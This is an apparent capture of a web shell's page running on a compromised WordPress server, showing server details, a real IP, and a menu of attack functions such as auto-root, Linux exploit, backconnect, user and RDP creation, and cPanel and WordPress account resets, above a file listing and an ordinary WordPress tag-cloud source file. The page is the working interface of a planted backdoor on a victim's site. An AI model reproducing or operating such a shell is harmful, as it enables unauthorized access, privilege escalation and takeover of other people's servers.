Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
infonepal /
wp-includes /
blocks /
[ HOME SHELL ]
Name
Size
Permission
Action
archives
[ DIR ]
drwxrwxr-x
audio
[ DIR ]
drwxrwxr-x
block
[ DIR ]
drwxrwxr-x
button
[ DIR ]
drwxrwxr-x
buttons
[ DIR ]
drwxrwxr-x
calendar
[ DIR ]
drwxrwxr-x
categories
[ DIR ]
drwxrwxr-x
code
[ DIR ]
drwxrwxr-x
column
[ DIR ]
drwxrwxr-x
columns
[ DIR ]
drwxrwxr-x
embed
[ DIR ]
drwxrwxr-x
file
[ DIR ]
drwxrwxr-x
freeform
[ DIR ]
drwxrwxr-x
gallery
[ DIR ]
drwxrwxr-x
group
[ DIR ]
drwxrwxr-x
heading
[ DIR ]
drwxrwxr-x
html
[ DIR ]
drwxrwxr-x
image
[ DIR ]
drwxrwxr-x
latest-comments
[ DIR ]
drwxrwxr-x
latest-posts
[ DIR ]
drwxrwxr-x
list
[ DIR ]
drwxrwxr-x
media-text
[ DIR ]
drwxrwxr-x
missing
[ DIR ]
drwxrwxr-x
more
[ DIR ]
drwxrwxr-x
nextpage
[ DIR ]
drwxrwxr-x
paragraph
[ DIR ]
drwxrwxr-x
preformatted
[ DIR ]
drwxrwxr-x
pullquote
[ DIR ]
drwxrwxr-x
quote
[ DIR ]
drwxrwxr-x
rss
[ DIR ]
drwxrwxr-x
search
[ DIR ]
drwxrwxr-x
separator
[ DIR ]
drwxrwxr-x
shortcode
[ DIR ]
drwxrwxr-x
social-link
[ DIR ]
drwxrwxr-x
social-links
[ DIR ]
drwxrwxr-x
spacer
[ DIR ]
drwxrwxr-x
subhead
[ DIR ]
drwxrwxr-x
table
[ DIR ]
drwxrwxr-x
tag-cloud
[ DIR ]
drwxrwxr-x
text-columns
[ DIR ]
drwxrwxr-x
verse
[ DIR ]
drwxrwxr-x
video
[ DIR ]
drwxrwxr-x
archives.php
2.7
KB
-rwxrwxr-x
block.php
1.78
KB
-rwxrwxr-x
calendar.php
1.53
KB
-rwxrwxr-x
categories.php
2.51
KB
-rwxrwxr-x
index.php
1.5
KB
-rwxrwxr-x
latest-comments.php
4.88
KB
-rwxrwxr-x
latest-posts.php
6.91
KB
-rwxrwxr-x
rss.php
3.17
KB
-rwxrwxr-x
search.php
4.81
KB
-rwxrwxr-x
shortcode.php
697
B
-rwxrwxr-x
social-link.php
57.81
KB
-rwxrwxr-x
tag-cloud.php
1.24
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tag-cloud.php
<?php /** * Server-side rendering of the `core/tag-cloud` block. * * @package WordPress */ /** * Renders the `core/tag-cloud` block on server. * * @param array $attributes The block attributes. * * @return string Returns the tag cloud for selected taxonomy. */ function render_block_core_tag_cloud( $attributes ) { $args = array( 'echo' => false, 'taxonomy' => $attributes['taxonomy'], 'show_count' => $attributes['showTagCounts'], ); $tag_cloud = wp_tag_cloud( $args ); if ( ! $tag_cloud ) { $labels = get_taxonomy_labels( get_taxonomy( $attributes['taxonomy'] ) ); $tag_cloud = esc_html( sprintf( /* translators: %s: taxonomy name */ __( 'Your site doesn’t have any %s, so there’s nothing to display here at the moment.' ), strtolower( $labels->name ) ) ); } $wrapper_attributes = get_block_wrapper_attributes(); return sprintf( '<p %1$s>%2$s</p>', $wrapper_attributes, $tag_cloud ); } /** * Registers the `core/tag-cloud` block on server. */ function register_block_core_tag_cloud() { register_block_type_from_metadata( __DIR__ . '/tag-cloud', array( 'render_callback' => 'render_block_core_tag_cloud', ) ); } add_action( 'init', 'register_block_core_tag_cloud' );
Close